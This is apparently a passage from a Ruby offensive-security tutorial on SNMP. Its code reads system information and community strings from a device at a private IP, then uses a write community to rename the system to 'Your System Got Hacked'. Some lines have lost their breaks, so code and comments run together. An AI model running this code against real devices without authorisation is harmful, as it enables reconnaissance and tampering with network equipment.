Miss configure an SNMP service would gives an attacker a huge mount of information. Let's to see you we can interact with the server to retrieve some info.
# KING SABRI | @KINGSABRIrequire'snmp'# Connect to SNMP servermanager =SNMP::Manager.new(:host =>'192.168.0.17')# General infoputs"SNMP Version: "+ manager.config[:version]puts"Community: "+ manager.config[:community]puts"Write Community: "+ manager.config[:WriteCommunity]# Get hostname, contact and locationhostname = manager.get("sysName.0").each_varbind.map {|vb| vb.value.to_s} # manager.get("sysName.0").varbind_list[0]
contact = manager.get("sysContact.0").each_varbind.map {|vb| vb.value.to_s} # manager.get("sysContact.0").varbind_list[0]
location = manager.get("sysLocation.0").each_varbind.map {|vb| vb.value.to_s} # manager.get("sysLocation.0").varbind_list[0]
# It would take an array of OIDsresponse = manager.get(["sysName.0","sysContact.0","sysLocation.0"])response.each_varbind do|vb|puts vb.value.to_send
Note: the OID names are case sensitive
Set Request
Sometimes we get luck and we get the private/management string of SNMP. At this moment we might be able to apply changes on the system, router, switches configurations.
require'snmp'includeSNMP# Connect to SNMP servermanager =SNMP::Manager.new(:host =>'192.168.0.17')# Config our request to OIDvarbind =VarBind.new("1.3.6.1.2.1.1.5.0",OctetString.new("Your System Got Hacked"))# Send your request with varbind our settingsmanager.set(varbind)# Check our changesmanager.get("sysName.0").each_varbind.map {|vb| vb.value.to_s}manager.close